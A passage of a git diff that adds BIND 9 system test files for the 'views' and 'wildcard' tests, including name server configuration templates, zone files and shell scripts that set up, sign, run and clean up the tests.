Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +include "zones.conf"; diff --git a/bin/tests/system/views/ns3/child.clone.db b/bin/tests/system/views/ns3/child.clone.db new file mode 100644 index 0000000..9b90023 --- /dev/null +++ b/bin/tests/system/views/ns3/child.clone.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns3 +@ TXT This is NS3. +ns3 A 10.53.0.3 diff --git a/bin/tests/system/views/ns3/internal.db b/bin/tests/system/views/ns3/internal.db new file mode 100644 index 0000000..c93c2b0 --- /dev/null +++ b/bin/tests/system/views/ns3/internal.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.1.0.1 + MX 10 intmail.example. + +intmail A 10.1.0.2 diff --git a/bin/tests/system/views/ns3/named1.conf.in b/bin/tests/system/views/ns3/named1.conf.in new file mode 100644 index 0000000..bec49f5 --- /dev/null +++ b/bin/tests/system/views/ns3/named1.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + allow-update { any; }; + file "internal.db"; +}; + +zone "child.clone" { + type primary; + file "child.clone.db"; +}; diff --git a/bin/tests/system/views/ns3/named2.conf.in b/bin/tests/system/views/ns3/named2.conf.in new file mode 100644 index 0000000..3becdd6 --- /dev/null +++ b/bin/tests/system/views/ns3/named2.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type secondary; + primaries { 10.53.0.2; }; + file "internal.bk"; +}; + +zone "child.clone" { + type primary; + file "child.clone.db"; +}; diff --git a/bin/tests/system/views/ns5/child.clone.db b/bin/tests/system/views/ns5/child.clone.db new file mode 100644 index 0000000..e29143b --- /dev/null +++ b/bin/tests/system/views/ns5/child.clone.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns3 +@ TXT This is NS5. +ns3 A 10.53.0.3 diff --git a/bin/tests/system/views/ns5/named.conf.in b/bin/tests/system/views/ns5/named.conf.in new file mode 100644 index 0000000..4b9e236 --- /dev/null +++ b/bin/tests/system/views/ns5/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "child.clone" { + type primary; + file "child.clone.db"; +}; diff --git a/bin/tests/system/views/setup.sh b/bin/tests/system/views/setup.sh new file mode 100644 index 0000000..278cb4d --- /dev/null +++ b/bin/tests/system/views/setup.sh @@ -0,0 +1,39 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. $SYSTEMTESTTOP/conf.sh + +cp -f ns2/example1.db ns2/example.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named1.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +# +# We remove k1 and k2 as KEYGEN is deterministic when given the +# same source of "random" data and we want different keys for +# internal and external instances of inline. +# +$KEYGEN -K ns2/internal -a ${DEFAULT_ALGORITHM} -q inline > /dev/null 2>&1 +$KEYGEN -K ns2/internal -a ${DEFAULT_ALGORITHM} -qfk inline > /dev/null 2>&1 +k1=$($KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -q inline 2> /dev/null) +k2=$($KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -qfk inline 2> /dev/null) +$KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -q inline > /dev/null 2>&1 +$KEYGEN -K ns2/external -a ${DEFAULT_ALGORITHM} -qfk inline > /dev/null 2>&1 +test -n "$k1" && rm -f ns2/external/"$k1".* +test -n "$k2" && rm -f ns2/external/"$k2".* diff --git a/bin/tests/system/views/tests.sh b/bin/tests/system/views/tests.sh new file mode 100644 index 0000000..5f5daad --- /dev/null +++ b/bin/tests/system/views/tests.sh @@ -0,0 +1,190 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. $SYSTEMTESTTOP/conf.sh + +dig_with_opts() { + "$DIG" +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd +noauth -p "${PORT}" "$@" +} + +dig_with_shortopts() { + "$DIG" +tcp +short -p "${PORT}" "$@" +} + +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 + +echo_i "fetching a.example from ns2's initial configuration" +dig_with_opts a.example. @10.53.0.2 any > dig.out.ns2.1 || status=1 + +echo_i "fetching a.example from ns3's initial configuration" +dig_with_opts a.example. @10.53.0.3 any > dig.out.ns3.1 || status=1 + +echo_i "copying in new configurations for ns2 and ns3" +rm -f ns2/named.conf ns3/named.conf ns2/example.db +cp -f ns2/example2.db ns2/example.db +copy_setports ns2/named2.conf.in ns2/named.conf +copy_setports ns3/named2.conf.in ns3/named.conf + +echo_i "reloading ns2 and ns3 with rndc" +nextpart ns2/named.run > /dev/null +nextpart ns3/named.run > /dev/null +rndc_reload ns2 10.53.0.2 +rndc_reload ns3 10.53.0.3 + +echo_i "wait for reload to complete" +ret=0 +_check_reload() ( + nextpartpeek ns2/named.run | grep "all zones loaded" > /dev/null && \ + nextpartpeek ns3/named.run | grep "all zones loaded" > /dev/null && \ + nextpartpeek ns3/named.run | grep "zone_dump: zone example/IN: enter" > /dev/null +) +retry_quiet 10 _check_reload || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "fetching a.example from ns2's 10.53.0.4, source address 10.53.0.4" +dig_with_opts -b 10.53.0.4 a.example. @10.53.0.4 any > dig.out.ns4.2 || status=1 + +echo_i "fetching a.example from ns2's 10.53.0.2, source address 10.53.0.2" +dig_with_opts -b 10.53.0.2 a.example. @10.53.0.2 any > dig.out.ns2.2 || status=1 + +echo_i "fetching a.example from ns3's 10.53.0.3, source address defaulted" +dig_with_opts @10.53.0.3 a.example. any > dig.out.ns3.2 || status=1 + +echo_i "comparing ns3's initial a.example to one from reconfigured 10.53.0.2" +digcomp dig.out.ns3.1 dig.out.ns2.2 || status=1 + +echo_i "comparing ns3's initial a.example to one from reconfigured 10.53.0.3" +digcomp dig.out.ns3.1 dig.out.ns3.2 || status=1 + +echo_i "comparing ns2's initial a.example to one from reconfigured 10.53.0.4" +digcomp dig.out.ns2.1 dig.out.ns4.2 || status=1 + +echo_i "comparing ns2's initial a.example to one from reconfigured 10.53.0.3" +echo_i "(should be different)" +if $PERL ../digcomp.pl dig.out.ns2.1 dig.out.ns3.2 >/dev/null +then + echo_i "no differences found. something's wrong." + status=1 +fi + +echo_i "updating cloned zone in internal view" +$NSUPDATE << EOF +server 10.53.0.2 ${PORT} +zone clone +update add b.clone. 300 in a 10.1.0.3 +send +EOF +echo_i "sleeping to allow update to take effect" +sleep 5 + +echo_i "verifying update affected both views" +ret=0 +one=$(dig_with_shortopts -b 10.53.0.2 @10.53.0.2 b.clone a) +two=$(dig_with_shortopts -b 10.53.0.4 @10.53.0.2 b.clone a) +if [ "$one" != "$two" ]; then + echo_i "'$one' does not match '$two'" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "verifying forwarder in cloned zone works" +ret=0 +one=$(dig_with_shortopts -b 10.53.0.2 @10.53.0.2 child.clone txt) +two=$(dig_with_shortopts -b 10.53.0.4 @10.53.0.2 child.clone txt) +three=$(dig_with_shortopts @10.53.0.3 child.clone txt) +four=$(dig_with_shortopts @10.53.0.5 child.clone txt) +echo "$three" | grep NS3 > /dev/null || { ret=1; echo_i "expected response from NS3 got '$three'"; } +echo "$four" | grep NS5 > /dev/null || { ret=1; echo_i "expected response from NS5 got '$four'"; } +if [ "$one" = "$two" ]; then + echo_i "'$one' matches '$two'" + ret=1 +fi +if [ "$one" != "$three" ]; then + echo_i "'$one' does not match '$three'" + ret=1 +fi +if [ "$two" != "$four" ]; then + echo_i "'$two' does not match '$four'" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "verifying inline zones work with views" +ret=0 +wait_for_signed() { + "$DIG" -p "${PORT}" @10.53.0.2 -b 10.53.0.2 +dnssec DNSKEY inline > dig.out.internal + "$DIG" -p "${PORT}" @10.53.0.2 -b 10.53.0.5 +dnssec DNSKEY inline > dig.out.external + grep "ANSWER: 4," dig.out.internal > /dev/null || return 1 + grep "ANSWER: 4," dig.out.external > /dev/null || return 1 + return 0 +} +retry_quiet 10 wait_for_signed || ret=1 +int=$(awk '$4 == "DNSKEY" { print $8 }' dig.out.internal | sort) +ext=$(awk '$4 == "DNSKEY" { print $8 }' dig.out.external | sort) +test "$int" != "$ext" || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "verifying adding of multiple inline zones followed by reconfiguration works" + +[ ! -f ns2/zones.conf ] && touch ns2/zones.conf +copy_setports ns2/named3.conf.in ns2/named.conf + +i=1 +while [ $i -lt 50 ]; do + ret=0 + zone_name=$(printf "example%03d.com" $i) + + # Add a new zone to the configuration. + cat >> ns2/zones.conf <<-EOF + zone "${zone_name}" { + type master; + file "db.${zone_name}"; + dnssec-dnskey-kskonly yes; + auto-dnssec maintain; + inline-signing yes; + }; + EOF + + # Create a master file for the zone. + cat > "ns2/db.${zone_name}" <<-EOF + \$TTL 86400 + @ IN SOA localhost. hostmaster.localhost ( + 1612542642 ; serial + 12H ; refresh + 1H ; retry + 2w ; expiry + 1h ; minimum + ) + @ IN NS localhost + localhost IN A 127.0.0.1 + EOF + + $KEYGEN -q -Kns2 -fk -aecdsa256 "${zone_name}" > /dev/null + $RNDCCMD 10.53.0.2 reconfig || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; break; fi + i=$((i + 1)) +done +status=$((status + ret)) + +echo_i "exit status: $status" +[ "$status" -eq 0 ] || exit 1 diff --git a/bin/tests/system/wildcard/clean.sh b/bin/tests/system/wildcard/clean.sh new file mode 100644 index 0000000..c690ade --- /dev/null +++ b/bin/tests/system/wildcard/clean.sh @@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.run +rm -f ns*/named.conf +rm -f ns1/K* +rm -f ns1/*.db +rm -f ns1/*.signed +rm -f ns1/dsset-* +rm -f ns1/keyset-* +rm -f ns1/trusted.conf +rm -f ns1/private.nsec.conf +rm -f ns1/private.nsec3.conf +rm -f ns1/signer.err +rm -f */named.memstats +rm -f dig.out.ns*.test* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/wildcard/ns1/allwild.db.in b/bin/tests/system/wildcard/ns1/allwild.db.in new file mode 100644 index 0000000..71575c3 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/allwild.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN allwild.test. +allwild.test. 3600 IN SOA . . 0 0 0 0 0 +allwild.test. 3600 NS ns.example.test. +*.allwild.test. 3600 A 192.0.2.1 diff --git a/bin/tests/system/wildcard/ns1/dlv.db.in b/bin/tests/system/wildcard/ns1/dlv.db.in new file mode 100644 index 0000000..6156de6 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/dlv.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. diff --git a/bin/tests/system/wildcard/ns1/example.db.in b/bin/tests/system/wildcard/ns1/example.db.in new file mode 100644 index 0000000..f23a2cb --- /dev/null +++ b/bin/tests/system/wildcard/ns1/example.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN example. +example. 3600 IN SOA . . 0 0 0 0 0 +example. 3600 NS ns.example.com. +example. 3600 NS ns.example.net. +*.example. 3600 TXT "this is a wildcard" +*.example. 3600 MX 10 host1.example. +sub.*.example. 3600 TXT "this is not a wildcard" +host1.example. 3600 A 192.0.2.1 +_ssh._tcp.host1.example. 3600 SRV 0 0 22 host1.example. +_ssh._tcp.host2.example. 3600 SRV 0 0 22 host2.example. +subdel.example. 3600 NS ns.example.com. +subdel.example. 3600 NS ns.example.net. diff --git a/bin/tests/system/wildcard/ns1/named.conf.in b/bin/tests/system/wildcard/ns1/named.conf.in new file mode 100644 index 0000000..ac02abf --- /dev/null +++ b/bin/tests/system/wildcard/ns1/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { type primary; file "root.db.signed"; }; + +/* + * RFC 4592 example zone. + */ +zone "allwild.test" { type primary; file "allwild.db"; }; +zone "example" { type primary; file "example.db"; }; +zone "nsec" { type primary; file "nsec.db.signed"; }; +zone "private.nsec" { type primary; file "private.nsec.db.signed"; }; + +/* + * The contents of nsec3 and private.nsec3 are specially chosen to + * have separate NSEC3 records for the "no qname proof" and the + * "closest encloser proof". + */ +zone "nsec3" { type primary; file "nsec3.db.signed"; }; +zone "private.nsec3" { type primary; file "private.nsec3.db.signed"; }; diff --git a/bin/tests/system/wildcard/ns1/nsec.db.in b/bin/tests/system/wildcard/ns1/nsec.db.in new file mode 100644 index 0000000..8869ab9 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/nsec.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +private NS a.root-servers.nil. +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/nsec3.db.in b/bin/tests/system/wildcard/ns1/nsec3.db.in new file mode 100644 index 0000000..8869ab9 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/nsec3.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +private NS a.root-servers.nil. +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/private.nsec.db.in b/bin/tests/system/wildcard/ns1/private.nsec.db.in new file mode 100644 index 0000000..b7cc222 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/private.nsec.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/private.nsec3.db.in b/bin/tests/system/wildcard/ns1/private.nsec3.db.in new file mode 100644 index 0000000..566b3f8 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/private.nsec3.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil. hostmaster.root-servers.nil. 1 1800 900 604800 86400 +@ NS a.root-servers.nil. +b A 1.2.3.4 +*.wild CNAME a. +a.wild A 1.2.3.5 diff --git a/bin/tests/system/wildcard/ns1/root.db.in b/bin/tests/system/wildcard/ns1/root.db.in new file mode 100644 index 0000000..ffeb0a6 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/root.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA a.root-servers.nil hostmaster.root-servers.nil 1 1800 900 604800 86400 +@ NS a.root-servers.nil +a.root-servers.nil A 10.53.0.1 +nsec NS a.root-servers.nil +nsec3 NS a.root-servers.nil diff --git a/bin/tests/system/wildcard/ns1/sign.sh b/bin/tests/system/wildcard/ns1/sign.sh new file mode 100755 index 0000000..493b057 --- /dev/null +++ b/bin/tests/system/wildcard/ns1/sign.sh @@ -0,0 +1,96 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=wildcard + +dssets= + +# RFC 4592 example zone. +cp allwild.db.in allwild.db +cp example.db.in example.db + +zone=nsec +infile=nsec.db.in +zonefile=nsec.db +outfile=nsec.db.signed +dssets="$dssets dsset-${zone}${TP}" + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +zone=private.nsec +infile=private.nsec.db.in +zonefile=private.nsec.db +outfile=private.nsec.db.signed + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +keyfile_to_static_ds $keyname2 > private.nsec.conf + +zone=nsec3 +infile=nsec3.db.in +zonefile=nsec3.db +outfile=nsec3.db.signed +dssets="$dssets dsset-${zone}${TP}" + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -3 - -H 10 -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +zone=private.nsec3 +infile=private.nsec3.db.in +zonefile=private.nsec3.db +outfile=private.nsec3.db.signed + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -3 - -H 10 -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +keyfile_to_static_ds $keyname2 > private.nsec3.conf + +zone=. +infile=root.db.in +zonefile=root.db +outfile=root.db.signed + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) +keyname2=$($KEYGEN -f KSK -a ${DEFAULT_ALGORITHM} -n zone $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key $dssets >$zonefile + +$SIGNER -o $zone -f $outfile $zonefile > /dev/null 2> signer.err || cat signer.err +echo_i "signed $zone" + +keyfile_to_static_ds $keyname2 > trusted.conf diff --git a/bin/tests/system/wildcard/ns2/named.conf.in b/bin/tests/system/wildcard/ns2/named.conf.in new file mode 100644 index 0000000..a9a2a70 --- /dev/null +++ b/bin/tests/system/wildcard/ns2/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation no; + notify yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/wildcard/ns3/named.conf.in b/bin/tests/system/wildcard/ns3/named.conf.in new file mode 100644 index 0000000..0b958fa --- /dev/null +++ b/bin/tests/system/wildcard/ns3/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +include "../ns1/trusted.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/wildcard/ns4/named.conf.in b/bin/tests/system/wildcard/ns4/named.conf.in new file mode 100644 index 0000000..b125fa7 --- /dev/null +++ b/bin/tests/system/wildcard/ns4/named.conf.in @@ -0,0 +1,31 @@ 